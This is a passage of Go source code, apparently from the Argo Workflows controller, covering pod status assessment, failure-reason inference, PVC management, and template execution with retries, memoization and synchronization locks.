err := json.Unmarshal([]byte(tmplStr), &tmpl)
if err != nil {
woc.log.WithError(err).WithField("pod", pod.ObjectMeta.Name).Warn("template annotation unreadable")
return nil
}
if tmpl.Daemon != nil && *tmpl.Daemon {
// pod is running and template is marked daemon. check if everything is ready
for _, ctrStatus := range pod.Status.ContainerStatuses {
if !ctrStatus.Ready {
return nil
}
}
// proceed to mark node status as running (and daemoned)
newPhase = wfv1.NodeRunning
newDaemonStatus = pointer.BoolPtr(true)
woc.log.Infof("Processing ready daemon pod: %v", pod.ObjectMeta.SelfLink)
}
woc.cleanUpPod(pod, tmpl)
default:
newPhase = wfv1.NodeError
message = fmt.Sprintf("Unexpected pod phase for %s: %s", pod.ObjectMeta.Name, pod.Status.Phase)
woc.log.WithField("displayName", node.DisplayName).WithField("templateName", node.TemplateName).
WithField("pod", pod.Name).Error(message)
}
for _, c := range pod.Status.ContainerStatuses {
ctrNodeName := fmt.Sprintf("%s.%s", node.Name, c.Name)
if woc.wf.GetNodeByName(ctrNodeName) == nil {
continue
}
switch {
case c.State.Waiting != nil:
woc.markNodePhase(ctrNodeName, wfv1.NodePending)
case c.State.Running != nil:
woc.markNodePhase(ctrNodeName, wfv1.NodeRunning)
case c.State.Terminated != nil:
exitCode := int(c.State.Terminated.ExitCode)
message := fmt.Sprintf("%s (exit code %d): %s", c.State.Terminated.Reason, exitCode, c.State.Terminated.Message)
switch exitCode {
case 0:
woc.markNodePhase(ctrNodeName, wfv1.NodeSucceeded)
case 64:
// special emissary exit code indicating the emissary errors, rather than the sub-process failure,
// (unless the sub-process coincidentally exits with code 64 of course)
woc.markNodePhase(ctrNodeName, wfv1.NodeError, message)
default:
woc.markNodePhase(ctrNodeName, wfv1.NodeFailed, message)
}
}
}
if newDaemonStatus != nil {
if !*newDaemonStatus {
// if the daemon status switched to false, we prefer to just unset daemoned status field
// (as opposed to setting it to false)
newDaemonStatus = nil
}
if (newDaemonStatus != nil && node.Daemoned == nil) || (newDaemonStatus == nil && node.Daemoned != nil) {
woc.log.Infof("Setting node %v daemoned: %v -> %v", node.ID, node.Daemoned, newDaemonStatus)
node.Daemoned = newDaemonStatus
updated = true
if pod.Status.PodIP != "" && pod.Status.PodIP != node.PodIP {
// only update Pod IP for daemoned nodes to reduce number of updates
woc.log.Infof("Updating daemon node %s IP %s -> %s", node.ID, node.PodIP, pod.Status.PodIP)
node.PodIP = pod.Status.PodIP
}
}
}
// we only need to update these values if the container transitions to complete
if !node.Phase.Fulfilled() && newPhase.Fulfilled() {
// outputs are mixed between the annotation (parameters, artifacts, and result) and the pod's status (exit code)
if exitCode := getExitCode(pod); exitCode != nil {
woc.log.Infof("Updating node %s exit code %d", node.ID, *exitCode)
node.Outputs = &wfv1.Outputs{ExitCode: pointer.StringPtr(fmt.Sprintf("%d", int(*exitCode)))}
if outputStr, ok := pod.Annotations[common.AnnotationKeyOutputs]; ok {
woc.log.Infof("Setting node %v outputs: %s", node.ID, outputStr)
if err := json.Unmarshal([]byte(outputStr), node.Outputs); err != nil { // I don't expect an error to ever happen in production
node.Phase = wfv1.NodeError
node.Message = err.Error()
}
}
}
}
if node.Phase != newPhase {
woc.log.Infof("Updating node %s status %s -> %s", node.ID, node.Phase, newPhase)
// if we are transitioning from Pending to a different state, clear out pending message
if node.Phase == wfv1.NodePending {
node.Message = ""
}
updated = true
node.Phase = newPhase
}
if message != "" && node.Message != message {
woc.log.Infof("Updating node %s message: %s", node.ID, message)
updated = true
node.Message = message
}
if node.Fulfilled() && node.FinishedAt.IsZero() {
updated = true
if !node.IsDaemoned() {
node.FinishedAt = getLatestFinishedAt(pod)
}
if node.FinishedAt.IsZero() {
// If we get here, the container is daemoned so the
// finishedAt might not have been set.
node.FinishedAt = metav1.Time{Time: time.Now().UTC()}
}
node.ResourcesDuration = resource.DurationForPod(pod)
}
if updated {
return node
}
return nil
}
func getExitCode(pod *apiv1.Pod) *int32 {
for _, c := range pod.Status.ContainerStatuses {
if c.Name == common.MainContainerName && c.State.Terminated != nil {
return pointer.Int32Ptr(c.State.Terminated.ExitCode)
}
}
return nil
}
func podHasContainerNeedingTermination(pod *apiv1.Pod, tmpl wfv1.Template) bool {
for _, c := range pod.Status.ContainerStatuses {
// Only clean up pod when both the wait and the main containers are terminated
if c.Name == common.WaitContainerName || tmpl.IsMainContainerName(c.Name) {
if c.State.Terminated == nil {
return false
}
}
}
return true
}
func (woc *wfOperationCtx) cleanUpPod(pod *apiv1.Pod, tmpl wfv1.Template) {
if podHasContainerNeedingTermination(pod, tmpl) {
woc.controller.queuePodForCleanup(woc.wf.Namespace, pod.Name, terminateContainers)
}
}
// getLatestFinishedAt returns the latest finishAt timestamp from all the
// containers of this pod.
func getLatestFinishedAt(pod *apiv1.Pod) metav1.Time {
var latest metav1.Time
for _, ctr := range pod.Status.InitContainerStatuses {
if ctr.State.Terminated != nil && ctr.State.Terminated.FinishedAt.After(latest.Time) {
latest = ctr.State.Terminated.FinishedAt
}
}
for _, ctr := range pod.Status.ContainerStatuses {
if ctr.State.Terminated != nil && ctr.State.Terminated.FinishedAt.After(latest.Time) {
latest = ctr.State.Terminated.FinishedAt
}
}
return latest
}
func getPendingReason(pod *apiv1.Pod) string {
for _, ctrStatus := range pod.Status.ContainerStatuses {
if ctrStatus.State.Waiting != nil {
if ctrStatus.State.Waiting.Message != "" {
return fmt.Sprintf("%s: %s", ctrStatus.State.Waiting.Reason, ctrStatus.State.Waiting.Message)
}
return ctrStatus.State.Waiting.Reason
}
}
// Example:
// - lastProbeTime: null
// lastTransitionTime: 2018-08-29T06:38:36Z
// message: '0/3 nodes are available: 2 Insufficient cpu, 3 MatchNodeSelector.'
// reason: Unschedulable
// status: "False"
// type: PodScheduled
for _, cond := range pod.Status.Conditions {
if cond.Reason == apiv1.PodReasonUnschedulable {
if cond.Message != "" {
return fmt.Sprintf("%s: %s", cond.Reason, cond.Message)
}
return cond.Reason
}
}
return ""
}
// inferFailedReason returns metadata about a Failed pod to be used in its NodeStatus
// Returns a tuple of the new phase and message
func (woc *wfOperationCtx) inferFailedReason(pod *apiv1.Pod) (wfv1.NodePhase, string) {
if pod.Status.Message != "" {
// Pod has a nice error message. Use that.
return wfv1.NodeFailed, pod.Status.Message
}
tmpl := woc.findTemplate(pod)
// We only get one message to set for the overall node status.
// If multiple containers failed, in order of preference:
// init, main (annotated), main (exit code), wait, sidecars
order := func(n string) int {
switch {
case n == common.InitContainerName:
return 0
case tmpl.IsMainContainerName(n):
return 1
case n == common.WaitContainerName:
return 2
default:
return 3
}
}
ctrs := append(pod.Status.InitContainerStatuses, pod.Status.ContainerStatuses...)
sort.Slice(ctrs, func(i, j int) bool { return order(ctrs[i].Name) < order(ctrs[j].Name) })
for _, ctr := range ctrs {
// Virtual Kubelet environment will not set the terminate on waiting container
// https://github.com/argoproj/argo-workflows/issues/3879
// https://github.com/virtual-kubelet/virtual-kubelet/blob/7f2a02291530d2df14905702e6d51500dd57640a/node/sync.go#L195-L208
if ctr.State.Waiting != nil {
return wfv1.NodeError, fmt.Sprintf("Pod failed before %s container starts", ctr.Name)
}
t := ctr.State.Terminated
if t == nil {
// We should never get here
log.Warnf("Pod %s phase was Failed but %s did not have terminated state", pod.Name, ctr.Name)
continue
}
if t.ExitCode == 0 {
continue
}
msg := fmt.Sprintf("%s (exit code %d)", t.Reason, t.ExitCode)
if t.Message != "" {
msg = fmt.Sprintf("%s: %s", msg, t.Message)
}
switch {
case ctr.Name == common.InitContainerName:
return wfv1.NodeError, msg
case tmpl.IsMainContainerName(ctr.Name):
return wfv1.NodeFailed, msg
case ctr.Name == common.WaitContainerName:
return wfv1.NodeError, msg
default:
if t.ExitCode == 137 || t.ExitCode == 143 {
// if the sidecar was SIGKILL'd (exit code 137) assume it was because argoexec
// forcibly killed the container, which we ignore the error for.
// Java code 143 is a normal exit 128 + 15 https://github.com/elastic/elasticsearch/issues/31847
log.Infof("Ignoring %d exit code of container '%s'", t.ExitCode, ctr.Name)
} else {
return wfv1.NodeFailed, msg
}
}
}
// If we get here, we have detected that the main/wait containers succeed but the sidecar(s)
// were SIGKILL'd. The executor may have had to forcefully terminate the sidecar (kill -9),
// resulting in a 137 exit code (which we had ignored earlier). If failMessages is empty, it
// indicates that this is the case and we return Success instead of Failure.
return wfv1.NodeSucceeded, ""
}
func (woc *wfOperationCtx) createPVCs(ctx context.Context) error {
if !(woc.wf.Status.Phase == wfv1.WorkflowPending || woc.wf.Status.Phase == wfv1.WorkflowRunning) {
// Only attempt to create PVCs if workflow is in Pending or Running state
// (e.g. passed validation, or didn't already complete)
return nil
}
if len(woc.execWf.Spec.VolumeClaimTemplates) == len(woc.wf.Status.PersistentVolumeClaims) {
// If we have already created the PVCs, then there is nothing to do.
// This will also handle the case where workflow has no volumeClaimTemplates.
return nil
}
pvcClient := woc.controller.kubeclientset.CoreV1().PersistentVolumeClaims(woc.wf.ObjectMeta.Namespace)
for i, pvcTmpl := range woc.execWf.Spec.VolumeClaimTemplates {
if pvcTmpl.ObjectMeta.Name == "" {
return errors.Errorf(errors.CodeBadRequest, "volumeClaimTemplates[%d].metadata.name is required", i)
}
pvcTmpl = *pvcTmpl.DeepCopy()
// PVC name will be <workflowname>-<volumeclaimtemplatename>
refName := pvcTmpl.ObjectMeta.Name
pvcName := fmt.Sprintf("%s-%s", woc.wf.ObjectMeta.Name, pvcTmpl.ObjectMeta.Name)
woc.log.Infof("Creating pvc %s", pvcName)
pvcTmpl.ObjectMeta.Name = pvcName
if pvcTmpl.ObjectMeta.Labels == nil {
pvcTmpl.ObjectMeta.Labels = make(map[string]string)
}
pvcTmpl.ObjectMeta.Labels[common.LabelKeyWorkflow] = woc.wf.ObjectMeta.Name
pvcTmpl.OwnerReferences = []metav1.OwnerReference{
*metav1.NewControllerRef(woc.wf, wfv1.SchemeGroupVersion.WithKind(workflow.WorkflowKind)),
}
pvc, err := pvcClient.Create(ctx, &pvcTmpl, metav1.CreateOptions{})
if err != nil && apierr.IsAlreadyExists(err) {
woc.log.WithField("pvc", pvcTmpl.Name).Info("pvc already exists. Workflow is re-using it")
pvc, err = pvcClient.Get(ctx, pvcTmpl.Name, metav1.GetOptions{})
if err != nil {
return err
}
hasOwnerReference := false
for i := range pvc.OwnerReferences {
ownerRef := pvc.OwnerReferences[i]
if ownerRef.UID == woc.wf.UID {
hasOwnerReference = true
break
}
}
if !hasOwnerReference {
return errors.Errorf(errors.CodeForbidden, "%s pvc already exists with different ownerreference", pvcTmpl.Name)
}
}
// continue
if err != nil {
return err
}
vol := apiv1.Volume{
Name: refName,
VolumeSource: apiv1.VolumeSource{
PersistentVolumeClaim: &apiv1.PersistentVolumeClaimVolumeSource{
ClaimName: pvc.ObjectMeta.Name,
},
},
}
woc.wf.Status.PersistentVolumeClaims = append(woc.wf.Status.PersistentVolumeClaims, vol)
woc.updated = true
}
return nil
}
func (woc *wfOperationCtx) deletePVCs(ctx context.Context) error {
gcStrategy := woc.wf.Spec.GetVolumeClaimGC().GetStrategy()
switch gcStrategy {
case wfv1.VolumeClaimGCOnSuccess:
if woc.wf.Status.Phase == wfv1.WorkflowError || woc.wf.Status.Phase == wfv1.WorkflowFailed {
// Skip deleting PVCs to reuse them for retried failed/error workflows.
// PVCs are automatically deleted when corresponded owner workflows get deleted.
return nil
}
case wfv1.VolumeClaimGCOnCompletion:
default:
return fmt.Errorf("unknown volume gc strategy: %s", gcStrategy)
}
totalPVCs := len(woc.wf.Status.PersistentVolumeClaims)
if totalPVCs == 0 {
// PVC list already empty. nothing to do
return nil
}
pvcClient := woc.controller.kubeclientset.CoreV1().PersistentVolumeClaims(woc.wf.ObjectMeta.Namespace)
newPVClist := make([]apiv1.Volume, 0)
// Attempt to delete all PVCs. Record first error encountered
var firstErr error
for _, pvc := range woc.wf.Status.PersistentVolumeClaims {
woc.log.Infof("Deleting PVC %s", pvc.PersistentVolumeClaim.ClaimName)
err := pvcClient.Delete(ctx, pvc.PersistentVolumeClaim.ClaimName, metav1.DeleteOptions{})
if err != nil {
if !apierr.IsNotFound(err) {
woc.log.Errorf("Failed to delete pvc %s: %v", pvc.PersistentVolumeClaim.ClaimName, err)
newPVClist = append(newPVClist, pvc)
if firstErr == nil {
firstErr = err
}
}
}
}
if len(newPVClist) != totalPVCs {
// we were successful in deleting one ore more PVCs
woc.log.Infof("Deleted %d/%d PVCs", totalPVCs-len(newPVClist), totalPVCs)
woc.wf.Status.PersistentVolumeClaims = newPVClist
woc.updated = true
}
return firstErr
}
func getChildNodeIndex(node *wfv1.NodeStatus, nodes wfv1.Nodes, index int) *wfv1.NodeStatus {
if len(node.Children) <= 0 {
return nil
}
nodeIndex := index
if index < 0 {
nodeIndex = len(node.Children) + index // This actually subtracts, since index is negative
if nodeIndex < 0 {
panic(fmt.Sprintf("child index '%d' out of bounds", index))
}
}
lastChildNodeName := node.Children[nodeIndex]
lastChildNode, ok := nodes[lastChildNodeName]
if !ok {
panic("could not find child node")
}
return &lastChildNode
}
type executeTemplateOpts struct {
// boundaryID is an ID for node grouping
boundaryID string
// onExitTemplate signifies that executeTemplate was called as part of an onExit handler.
// Necessary for graceful shutdowns
onExitTemplate bool
// activeDeadlineSeconds is a deadline to set to any pods executed. This is necessary for pods to inherit backoff.maxDuration
executionDeadline time.Time
}
// executeTemplate executes the template with the given arguments and returns the created NodeStatus
// for the created node (if created). Nodes may not be created if parallelism or deadline exceeded.
// nodeName is the name to be used as the name of the node, and boundaryID indicates which template
// boundary this node belongs to.
func (woc *wfOperationCtx) executeTemplate(ctx context.Context, nodeName string, orgTmpl wfv1.TemplateReferenceHolder, tmplCtx *templateresolution.Context, args wfv1.Arguments, opts *executeTemplateOpts) (*wfv1.NodeStatus, error) {
woc.log.Debugf("Evaluating node %s: template: %s, boundaryID: %s", nodeName, common.GetTemplateHolderString(orgTmpl), opts.boundaryID)
node := woc.wf.GetNodeByName(nodeName)
// Set templateScope from which the template resolution starts.
templateScope := tmplCtx.GetTemplateScope()
newTmplCtx, resolvedTmpl, templateStored, err := tmplCtx.ResolveTemplate(orgTmpl)
if err != nil {
return woc.initializeNodeOrMarkError(node, nodeName, templateScope, orgTmpl, opts.boundaryID, err), err
}
// A new template was stored during resolution, persist it
if templateStored {
woc.updated = true
}
localParams := make(map[string]string)
// Inject the pod name. If the pod has a retry strategy, the pod name will be changed and will be injected when it
// is determined
if resolvedTmpl.IsPodType() && woc.retryStrategy(resolvedTmpl) == nil {
localParams[common.LocalVarPodName] = woc.wf.NodeID(nodeName)
}
// Merge Template defaults to template
err = woc.mergedTemplateDefaultsInto(resolvedTmpl)
if err != nil {
return woc.initializeNodeOrMarkError(node, nodeName, templateScope, orgTmpl, opts.boundaryID, err), err
}
// Inputs has been processed with arguments already, so pass empty arguments.
processedTmpl, err := common.ProcessArgs(resolvedTmpl, &args, woc.globalParams, localParams, false)
if err != nil {
return woc.initializeNodeOrMarkError(node, nodeName, templateScope, orgTmpl, opts.boundaryID, err), err
}
// If memoization is on, check if node output exists in cache
if node == nil && processedTmpl.Memoize != nil {
memoizationCache := woc.controller.cacheFactory.GetCache(controllercache.ConfigMapCache, processedTmpl.Memoize.Cache.ConfigMap.Name)
if memoizationCache == nil {
err := fmt.Errorf("cache could not be found or created")
woc.log.WithFields(log.Fields{"cacheName": processedTmpl.Memoize.Cache.ConfigMap.Name}).WithError(err)
return woc.initializeNodeOrMarkError(node, nodeName, templateScope, orgTmpl, opts.boundaryID, err), err
}
entry, err := memoizationCache.Load(ctx, processedTmpl.Memoize.Key)
if err != nil {
return woc.initializeNodeOrMarkError(node, nodeName, templateScope, orgTmpl, opts.boundaryID, err), err
}
hit := entry.Hit()
var outputs *wfv1.Outputs
if processedTmpl.Memoize.MaxAge != "" {
maxAge, err := time.ParseDuration(processedTmpl.Memoize.MaxAge)
if err != nil {
err := fmt.Errorf("invalid maxAge: %s", err)
return woc.initializeNodeOrMarkError(node, nodeName, templateScope, orgTmpl, opts.boundaryID, err), err
}
maxAgeOutputs, ok := entry.GetOutputsWithMaxAge(maxAge)
if !ok {
// The outputs are expired, so this cache entry is not hit
hit = false
}
outputs = maxAgeOutputs
} else {
outputs = entry.GetOutputs()
}
memoizationStatus := &wfv1.MemoizationStatus{
Hit: hit,
Key: processedTmpl.Memoize.Key,
CacheName: processedTmpl.Memoize.Cache.ConfigMap.Name,
}
if hit {
node = woc.initializeCacheHitNode(nodeName, processedTmpl, templateScope, orgTmpl, opts.boundaryID, outputs, memoizationStatus)
} else {
node = woc.initializeCacheNode(nodeName, processedTmpl, templateScope, orgTmpl, opts.boundaryID, memoizationStatus)
}
woc.wf.Status.Nodes[node.ID] = *node
woc.updated = true
}
if node != nil {
if node.Fulfilled() {
woc.controller.syncManager.Release(woc.wf, node.ID, processedTmpl.Synchronization)
woc.log.Debugf("Node %s already completed", nodeName)
if processedTmpl.Metrics != nil {
// Check if this node completed between executions. If it did, emit metrics. If a node completes within
// the same execution, its metrics are emitted below.
// We can infer that this node completed during the current operation, emit metrics
if prevNodeStatus, ok := woc.preExecutionNodePhases[node.ID]; ok && !prevNodeStatus.Fulfilled() {
localScope, realTimeScope := woc.prepareMetricScope(node)
woc.computeMetrics(processedTmpl.Metrics.Prometheus, localScope, realTimeScope, false)
}
}
return node, nil
}
woc.log.Debugf("Executing node %s of %s is %s", nodeName, node.Type, node.Phase)
// Memoized nodes don't have StartedAt.
if node.StartedAt.IsZero() {
node.StartedAt = metav1.Time{Time: time.Now().UTC()}
node.EstimatedDuration = woc.estimateNodeDuration(node.Name)
woc.wf.Status.Nodes[node.ID] = *node
woc.updated = true
}
}
// Check if we took too long operating on this workflow and immediately return if we did
if time.Now().UTC().After(woc.deadline) {
woc.log.Warnf("Deadline exceeded")
woc.requeue()
return node, ErrDeadlineExceeded
}
// Check the template deadline for Pending nodes
// This check will cover the resource forbidden, synchronization scenario,
// In above scenario, only Node will be created in pending state
_, err = woc.checkTemplateTimeout(processedTmpl, node)
if err != nil {
woc.log.Warnf("Template %s exceeded its deadline", processedTmpl.Name)
return woc.markNodePhase(nodeName, wfv1.NodeFailed, err.Error()), err
}
// Check if we exceeded template or workflow parallelism and immediately return if we did
if err := woc.checkParallelism(processedTmpl, node, opts.boundaryID); err != nil {
return node, err
}
if processedTmpl.Synchronization != nil {
lockAcquired, wfUpdated, msg, err := woc.controller.syncManager.TryAcquire(woc.wf, woc.wf.NodeID(nodeName), processedTmpl.Synchronization)
if err != nil {
return woc.initializeNodeOrMarkError(node, nodeName, templateScope, orgTmpl, opts.boundaryID, err), err
}
if !lockAcquired {
if node == nil {
node = woc.initializeExecutableNode(nodeName, wfutil.GetNodeType(processedTmpl), templateScope, processedTmpl, orgTmpl, opts.boundaryID, wfv1.NodePending, msg)
}
lockName, err := argosync.GetLockName(processedTmpl.Synchronization, woc.wf.Namespace)
if err != nil {
// If an error were to be returned here, it would have been caught by TryAcquire. If it didn't, then it is
// unexpected behavior and is a bug.
panic("bug: GetLockName should not return an error after a call to TryAcquire")
}
return woc.markNodeWaitingForLock(node.Name, lockName.EncodeName()), nil
} else {
woc.log.Infof("Node %s acquired synchronization lock", nodeName)
if node != nil {
node.Message = ""
node = woc.markNodeWaitingForLock(node.Name, "")
}
}
woc.updated = wfUpdated
}
// If the user has specified retries, node becomes a special retry node.
// This node acts as a parent of all retries that will be done for
// the container. The status of this node should be "Success" if any
// of the retries succeed. Otherwise, it is "Failed".
retryNodeName := ""
if woc.retryStrategy(processedTmpl) != nil {
retryNodeName = nodeName
retryParentNode := node
if retryParentNode == nil {
woc.log.Debugf("Inject a retry node for node %s", retryNodeName)
retryParentNode = woc.initializeExecutableNode(retryNodeName, wfv1.NodeTypeRetry, templateScope, processedTmpl, orgTmpl, opts.boundaryID, wfv1.NodeRunning)
}
processedRetryParentNode, continueExecution, err := woc.processNodeRetries(retryParentNode, *woc.retryStrategy(processedTmpl), opts)
if err != nil {
return woc.markNodeError(retryNodeName, err), err
} else if !continueExecution {
// We are still waiting for a retry delay to finish
return retryParentNode, nil
}
retryParentNode = processedRetryParentNode
// The retry node might have completed by now.
if retryParentNode.Fulfilled() {
if processedTmpl.Metrics != nil {
// In this check, a completed node may or may not have existed prior to this execution. If it did exist, ensure that it wasn't
// completed before this execution. If it did not exist prior, then we can infer that it was completed during this execution.
// The statement "(!ok || !prevNodeStatus.Fulfilled())" checks for this behavior and represents the material conditional
// "ok -> !prevNodeStatus.Fulfilled()" (https://en.wikipedia.org/wiki/Material_conditional)
if prevNodeStatus, ok := woc.preExecutionNodePhases[retryParentNode.ID]; (!ok || !prevNodeStatus.Fulfilled()) && retryParentNode.Fulfilled() {
localScope, realTimeScope := woc.prepareMetricScope(processedRetryParentNode)
woc.computeMetrics(processedTmpl.Metrics.Prometheus, localScope, realTimeScope, false)
}
}
if processedTmpl.Synchronization != nil {
woc.controller.syncManager.Release(woc.wf, node.ID, processedTmpl.Synchronization)
}
return retryParentNode, nil
}
lastChildNode := getChildNodeIndex(retryParentNode, woc.wf.Status.Nodes, -1)
if lastChildNode != nil && !lastChildNode.Fulfilled() {
// Last child node is still running.
nodeName = lastChildNode.Name
node = lastChildNode
} else {
// Create a new child node and append it to the retry node.
nodeName = fmt.Sprintf("%s(%d)", retryNodeName, len(retryParentNode.Children))
woc.addChildNode(retryNodeName, nodeName)
node = nil
// It has to be one child at least
if lastChildNode != nil {
RetryOnDifferentHost(woc.wf.NodeID(retryNodeName))(*woc.retryStrategy(processedTmpl), woc.wf.Status.Nodes, processedTmpl)
}
localParams := make(map[string]string)
// Change the `pod.name` variable to the new retry node name
if processedTmpl.IsPodType() {
localParams[common.LocalVarPodName] = woc.wf.NodeID(nodeName)
}
// Inject the retryAttempt number
localParams[common.LocalVarRetries] = strconv.Itoa(len(retryParentNode.Children))
processedTmpl, err = common.SubstituteParams(processedTmpl, map[string]string{}, localParams)
if err != nil {
return woc.initializeNodeOrMarkError(node, nodeName, templateScope, orgTmpl, opts.boundaryID, err), err
}
}
}
switch processedTmpl.GetType() {
case wfv1.TemplateTypeContainer:
node, err = woc.executeContainer(ctx, nodeName, templateScope, processedTmpl, orgTmpl, opts)
case wfv1.TemplateTypeContainerSet:
node, err = woc.executeContainerSet(ctx, nodeName, templateScope, processedTmpl, orgTmpl, opts)
case wfv1.TemplateTypeSteps:
node, err = woc.executeSteps(ctx, nodeName, newTmplCtx, templateScope, processedTmpl, orgTmpl, opts)
case wfv1.TemplateTypeScript:
node, err = woc.executeScript(ctx, nodeName, templateScope, processedTmpl, orgTmpl, opts)
case wfv1.TemplateTypeResource:
node, err = woc.executeResource(ctx, nodeName, templateScope, processedTmpl, orgTmpl, opts)
case wfv1.TemplateTypeDAG:
node, err = woc.executeDAG(ctx, nodeName, newTmplCtx, templateScope, processedTmpl, orgTmpl, opts)
case wfv1.TemplateTypeSuspend:
node, err = woc.executeSuspend(nodeName, templateScope, processedTmpl, orgTmpl, opts)
case wfv1.TemplateTypeData:
node, err = woc.executeData(ctx, nodeName, templateScope, processedTmpl, orgTmpl, opts)
default:
err = errors.Errorf(errors.CodeBadRequest, "Template '%s' missing specification", processedTmpl.Name)
return woc.initializeNode(nodeName, wfv1.NodeTypeSkipped, templateScope, orgTmpl, opts.boundaryID, wfv1.NodeError, err.Error()), err
}
if err != nil {
node = woc.markNodeError(nodeName, err)
woc.controller.syncManager.Release(woc.wf, node.ID, processedTmpl.Synchronization)
// If retry policy is not set, or if it is not set to Always or OnError, we won't attempt to retry an errored container
// and we return instead.
retryStrategy := woc.retryStrategy(processedTmpl)
if retryStrategy == nil ||
(retryStrategy.RetryPolicy != wfv1.RetryPolicyAlways &&
retryStrategy.RetryPolicy != wfv1.RetryPolicyOnError &&
retryStrategy.RetryPolicy != wfv1.RetryPolicyOnTransientError) {
return node, err
}
}
if node.Fulfilled() {
woc.controller.syncManager.Release(woc.wf, node.ID, processedTmpl.Synchronization)
}
if processedTmpl.Metrics != nil {
// Check if the node was just created, if it was emit realtime metrics.
// If the node did not previously exist, we can infer that it was created during the current operation, emit real time metrics.
if _, ok := woc.preExecutionNodePhases[node.ID]; !ok {
localScope, realTimeScope := woc.prepareMetricScope(node)
woc.computeMetrics(processedTmpl.Metrics.Prometheus, localScope, realTimeScope, true)
}
// Check if the node completed during this execution, if it did emit metrics
//
// This check is necessary because sometimes a node will be marked completed during the current execution and will
// not be considered again. The best example of this is the entrypoint steps/dag template (once completed, the
// workflow ends and it's not reconsidered). This checks makes sure that its metrics also get emitted.
//
// In this check, a completed node may or may not have existed prior to this execution. If it did exist, ensure that it wasn't
// completed before this execution. If it did not exist prior, then we can infer that it was completed during this execution.
// The statement "(!ok || !prevNodeStatus.Fulfilled())" checks for this behavior and represents the material conditional
// "ok -> !prevNodeStatus.Fulfilled()" (https://en.wikipedia.org/wiki/Material_conditional)
if prevNodeStatus, ok := woc.preExecutionNodePhases[node.ID]; (!ok || !prevNodeStatus.Fulfilled()) && node.Fulfilled() {
localScope, realTimeScope := woc.prepareMetricScope(node)
woc.computeMetrics(processedTmpl.Metrics.Prometheus, localScope, realTimeScope, false)
}
}
node = woc.wf.GetNodeByName(node.Name)
// Swap the node back to retry node
if retryNodeName != "" {
retryNode := woc.wf.GetNodeByName(retryNodeName)
if !retryNode.Fulfilled() && node.Fulfilled() { // if the retry child has completed we need to update outself
retryNode, err = woc.executeTemplate(ctx, retryNodeName, orgTmpl, tmplCtx, args, opts)
if err != nil {
return woc.markNodeError(node.Name, err), err
}
}
node = retryNode
}
return node, nil
}
// Checks if the template has exceeded its deadline
func (woc *wfOperationCtx) checkTemplateTimeout(tmpl *wfv1.Template, node *wfv1.NodeStatus) (*time.Time, error) {
if node == nil {
return nil, nil
}
if tmpl.Timeout != "" {
tmplTimeout, err := time.ParseDuration(tmpl.Timeout)
if err != nil {
return nil, fmt.Errorf("invalid timeout format. %v", err)
}
deadline := node.StartedAt.Add(tmplTimeout)
if node.Phase == wfv1.NodePending && time.Now().After(deadline) {
return nil, ErrTimeout
}
return &deadline, nil
}
return nil, nil
}
// markWorkflowPhase is a convenience method to set the phase of the workflow with optional message
// optionally marks the workflow completed, which sets the finishedAt timestamp and completed label
func (woc *wfOperationCtx) markWorkflowPhase(ctx context.Context, phase wfv1.WorkflowPhase, message string) {
markCompleted := false
if woc.wf.Status.Phase != phase {
if woc.wf.Status.Fulfilled() {
woc.log.WithFields(log.Fields{"fromPhase": woc.wf.Status.Phase, "toPhase": phase}).
Panic("workflow is already fulfilled")
}
woc.log.Infof("Updated phase %s -> %s", woc.wf.Status.Phase, phase)
woc.updated = true
woc.wf.Status.Phase = phase
if woc.wf.ObjectMeta.Labels == nil {
woc.wf.ObjectMeta.Labels = make(map[string]string)
}
woc.wf.ObjectMeta.Labels[common.LabelKeyPhase] = string(phase)
switch phase {
case wfv1.WorkflowRunning:
woc.eventRecorder.Event(woc.wf, apiv1.EventTypeNormal, "WorkflowRunning", "Workflow Running")
case wfv1.WorkflowSucceeded:
woc.eventRecorder.Event(woc.wf, apiv1.EventTypeNormal, "WorkflowSucceeded", "Workflow completed")
case wfv1.WorkflowFailed, wfv1.WorkflowError:
woc.eventRecorder.Event(woc.wf, apiv1.EventTypeWarning, "WorkflowFailed", message)
}
markCompleted = phase.Completed()
}
if woc.wf.Status.StartedAt.IsZero() && phase != wfv1.WorkflowPending {
woc.updated = true
woc.wf.Status.StartedAt = metav1.Time{Time: time.Now().UTC()}
woc.wf.Status.EstimatedDuration = woc.estimateWorkflowDuration()
}
if woc.wf.Status.Message != message {
woc.log.Infof("Updated message %s -> %s", woc.wf.Status.Message, message)
woc.updated = true
woc.wf.Status.Message = message
}
if phase == wfv1.WorkflowError {
entryNode, ok := woc.wf.Status.Nodes[woc.wf.ObjectMeta.Name]
if ok && entryNode.Phase == wfv1.NodeRunning {
entryNode.Phase = wfv1.NodeError
entryNode.Message = "Workflow operation error"
woc.wf.Status.Nodes[woc.wf.ObjectMeta.Name] = entryNode
woc.updated = true
}
}
switch phase {
case wfv1.WorkflowSucceeded, wfv1.WorkflowFailed, wfv1.WorkflowError:
// wait for all daemon nodes to get terminated before marking workflow completed
if markCompleted && !woc.hasDaemonNodes() {
woc.log.Infof("Marking workflow completed")
woc.wf.Status.FinishedAt = metav1.Time{Time: time.Now().UTC()}
woc.globalParams[common.GlobalVarWorkflowDuration] = fmt.Sprintf("%f", woc.wf.Status.FinishedAt.Sub(woc.wf.Status.StartedAt.Time).Seconds())
if woc.wf.ObjectMeta.Labels == nil {
woc.wf.ObjectMeta.Labels = make(map[string]string)
}
woc.wf.ObjectMeta.Labels[common.LabelKeyCompleted] = "true"
woc.wf.Status.Conditions.UpsertCondition(wfv1.Condition{Status: metav1.ConditionTrue, Type: wfv1.ConditionTypeCompleted})
err := woc.deletePDBResource(ctx)
if err != nil {
woc.wf.Status.Phase = wfv1.WorkflowError
woc.wf.ObjectMeta.Labels[common.LabelKeyPhase] = string(wfv1.NodeError)
woc.updated = true
woc.wf.Status.Message = err.Error()
}
if woc.controller.wfArchive.IsEnabled() {
if woc.controller.isArchivable(woc.wf) {
woc.log.Infof("Marking workflow as pending archiving")
woc.wf.Labels[common.LabelKeyWorkflowArchivingStatus] = "Pending"
} else {
woc.log.Infof("Doesn't match with archive label selector. Skipping Archive")
}
}
woc.updated = true
}
}
}
// get a predictor, this maybe null implementation in the case of rare error
func (woc *wfOperationCtx) getEstimator() estimation.Estimator {
if woc.estimator == nil {
woc.estimator, _ = woc.controller.estimatorFactory.NewEstimator(woc.wf)
}
return woc.estimator
}
func (woc *wfOperationCtx) estimateWorkflowDuration() wfv1.EstimatedDuration {
return woc.getEstimator().EstimateWorkflowDuration()
}
func (woc *wfOperationCtx) estimateNodeDuration(nodeName string) wfv1.EstimatedDuration {
